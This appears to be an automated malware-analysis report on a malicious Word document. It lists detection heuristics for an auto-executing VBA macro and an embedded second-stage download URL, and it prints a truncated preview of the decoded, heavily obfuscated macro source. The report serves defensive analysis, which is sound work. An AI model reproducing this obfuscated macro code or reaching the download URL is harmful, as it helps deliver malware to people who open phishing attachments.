MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro utilizes a CreateObject call, a common technique for launching malicious payloads. The presence of an embedded URL suggests the macro's purpose is to download and execute a second-stage payload from a remote location.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://downloditnow.top/text.png In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 110294 bytes |
SHA-256: 2359a033667b0166297d55bf00324e879c29de0c64480fb6b00b9d7bd880f090 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QPqhao"
Public Function ueKKiQh67yGKL0b(ByRef FvNXy1sqKwtTQk As String, ByRef THREE As String) As String
Dim mHjZzT23sLzAXy6() As Byte
Dim j3UpX9l8kc1TUq As Object
If Len(Application.UserName) < 100 Then
Dim Wq7jZhy8mlfyKIt As String
End If
If Application.UserName = "QJwVaPUaLdt" Then
MsgBox ("XvL9fTMUGAm")
Else
Dim sp1e3wtTUbstlk As Integer
End If
Dim OSaZFqWkQDJYO1D5d0() As Byte
Dim xhWBWUZw4yoner, xO58k2gsWnj As Integer
xhWBWUZw4yoner = 6
xO58k2gsWnj = 6
#If RmxHRVKO2sa <> 0 Then
RmxHRVKO2sa = RmxHRVKO2sa + 6
Dim xvvejmyYqG8 As Variant
Else
Dim xvvejmyYqG8 As Object
#End If
If xhWBWUZw4yoner > xO58k2gsWnj Then
For lHarMJ36OLsbBr = xO58k2gsWnj To xhWBWUZw4yoner
xO58k2gsWnj = xO58k2gsWnj / xhWBWUZw4yoner
Next lHarMJ36OLsbBr
End If
Dim P3377dW4rqjJAU As Integer
For KrVtlIh8EkD = 3 To 33
P3377dW4rqjJAU = KrVtlIh8EkD
Next KrVtlIh8EkD
Dim JGiCK6t2KBdVEA As Integer
For ZvQGmL9Momw = 4 To 41
JGiCK6t2KBdVEA = ZvQGmL9Momw
Next ZvQGmL9Momw
Dim Z50ziAq7Jkqaog As Integer
Dim DiEHrTlaBxc As String
Z50ziAq7Jkqaog = 1535
Dim nJqa0FjIrh0 As Integer
DiEHrTlaBxc = Right(CStr(Z50ziAq7Jkqaog), Chr(Tan(CDbl(1.55039099610836))))
nJqa0FjIrh0 = CInt(DiEHrTlaBxc)
For EQtqT9h1pbY = nJqa0FjIrh0 To 99
Z50ziAq7Jkqaog = Z50ziAq7Jkqaog + 3
Next EQtqT9h1pbY
If Chr(Tan(CDbl(1.55860180934664))) = R Then
Dim eLKu0Ta7pmuSuu As String
Dim CfRX1bMrKpz As String
CfRX1bMrKpz = f23nMxDsK6r
eLKu0Ta7pmuSuu = QMOlf1mxdDz
End If
If (StrComp(eLKu0Ta7pmuSuu, CfRX1bMrKpz, vbTextCompare) <> 0) Then
MsgBox ("UYu0qnCA2Bf6Ob")
End If
Dim J5YSJ12W67xEjH As Object
If Len(Application.UserName) < 100 Then
Dim u8sf5YjPt4a8ogW As String
End If
Dim t9KrLpFIkGFXCW As Long
Dim pmxzYzH14Igcr2, ERvdSjuuN74 As String
pmxzYzH14Igcr2 = 8
ERvdSjuuN74 = 2
#If pmxzYzH14Igcr2 > ERvdSjuuN74 Then
Dim MPeYBNRJaK7 As Object
#Else
Dim MPeYBNRJaK7 As Integer
MPeYBNRJaK7 = 8 + 2
Dim sySBwKTksmv As Integer
For CBQ0TDyeCY2 = sySBwKTksmv To pmxzYzH14Igcr2
sySBwKTksmv = sySBwKTksmv + CInt(Chr(Tan(CDbl(1.55039099610836))))
Next CBQ0TDyeCY2
#End If
Dim DwIqipqiRTUl0F As Integer
Dim N5Zob7848br As String
DwIqipqiRTUl0F = 3399
Dim ooXRTWxtzrh As Integer
N5Zob7848br = Right(CStr(DwIqipqiRTUl0F), Chr(Tan(CDbl(1.55039099610836))))
ooXRTWxtzrh = CInt(N5Zob7848br)
For MLhUqdUfiB0 = ooXRTWxtzrh To 14
DwIqipqiRTUl0F = DwIqipqiRTUl0F + 8
Next MLhUqdUfiB0
Dim FHRekc2q5QCJTt, hEbhsiLuTYN As String
FHRekc2q5QCJTt = 3
hEbhsiLuTYN = 2
#If FHRekc2q5QCJTt > hEbhsiLuTYN Then
Dim SjCIy8mbvgD As Object
#Else
Dim SjCIy8mbvgD As Integer
SjCIy8mbvgD = 3 + 2
Dim T1jWzT1tPGo As Integer
For K0zk19ICWz3 = T1jWzT1tPGo To FHRekc2q5QCJTt
T1jWzT1tPGo = T1jWzT1tPGo + CInt(Chr(Tan(CDbl(1.55039099610836))))
Next K0zk19ICWz3
#End If
If Application.UserName = "r6Ti2RC8R64" Then
MsgBox ("uARtlDWFcb4")
Else
Dim llW6NMO95irBtZ As Integer
End If
If Len(Application.UserName) < 100 Then
Dim RPeAlkaafwJeIOM As String
End If
Dim GsJAxoSbwfEeKeZ As String
GsJAxoSbwfEeKeZ = Application.UserName
Dim Wyi4cKr9EvtMIRtrQ, ICyyDwdNfhNQygPQdTH As Integer
ICyyDwdNfhNQygPQdTH = Len(GsJAxoSbwfEeKeZ)
Dim WYAL5RUoonbtlcmX As Collection
While ICyyDwdNfhNQygPQdTH > 6
Wyi4cKr9EvtMIRtrQ = Wyi4cKr9EvtMIRtrQ + 4
ICyyDwdNfhNQygPQdTH = ICyyDwdNfhNQygPQdTH - 1
Wend
Dim rqOdQTBdkc1COMe As Collection
Set rqOdQTBdkc1COMe = New Collection
rqOdQTBdkc1COMe.Add "d5jheCS2voe8DTC0Vq5Q5bquDmZFb9QHPlAi0XSViAd4OOoSVTH4AspCPye2nMbvXXtcTdA8Xks57wgy7GtH2VGh57TB2arV"
rqOdQTBdkc1COMe.Add "g1fM81SJga9uEcSq4gcT3CQMgVK8F72XVQQpTvI1ysyqhK20tMfK2PydkTpnrUDjhmY"
rqOdQTBdkc1COMe.Add "nWJYleKNjoWcTP3csfGcwEAGfKepPJ5vEoGxWvRunQAoTKYFKHxHSWaiWD3aAf7atkYpIDG6NWyfDVwUvZ"
rqOdQTBdkc1COMe.Add "UydrNhdS10tHSk5svt6GA236h4fBQjplAxG4GqblkzEXmrNdZDiC"
rqOdQTBdkc1COMe.Add "Hb4hKSCbCSLIGc
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.